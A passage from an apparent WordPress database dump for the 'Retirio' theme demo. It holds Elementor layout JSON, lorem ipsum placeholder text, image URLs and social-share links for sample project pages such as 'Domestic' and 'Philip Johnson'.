fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2171,4642,'_elementor_page_assets','a:0:{}'),(2172,4642,'_thumbnail_id','1159'),(2173,4642,'_wxr_import_has_attachment_refs','1'),(2174,4643,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2175,4643,'ova_project_service','Interior design'),(2176,4643,'ova_project_architect','Mike hardson'),(2177,4643,'ova_project_duration','4.5 Months'),(2178,4643,'ova_project_location','Broklyn, New York'),(2179,4643,'_elementor_edit_mode','builder'),(2180,4643,'_elementor_template_type','wp-post'),(2181,4643,'_elementor_version','3.6.6'),(2182,4643,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:81:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/domestic/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:88:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/domestic/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:96:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/domestic/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:82:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/domestic/\";}}'),(2183,4643,'_wp_page_template','default'),(2184,4643,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Domestic\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2185,4643,'_elementor_page_assets','a:0:{}'),(2186,4643,'_thumbnail_id','1160'),(2187,4643,'_wxr_import_has_attachment_refs','1'),(2188,4644,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2189,4644,'ova_project_service','Interior design'),(2190,4644,'ova_project_architect','Mike hardson'),(2191,4644,'ova_project_duration','4.5 Months'),(2192,4644,'ova_project_location','Broklyn, New York'),(2193,4644,'_elementor_edit_mode','builder'),(2194,4644,'_elementor_template_type','wp-post'),(2195,4644,'_elementor_version','3.6.6'),(2196,4644,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:87:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:94:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:102:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:88:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/philip-johnson/\";}}'),(2197,4644,'_wp_page_template','default'),(2198,4644,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Philip Johnson\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed 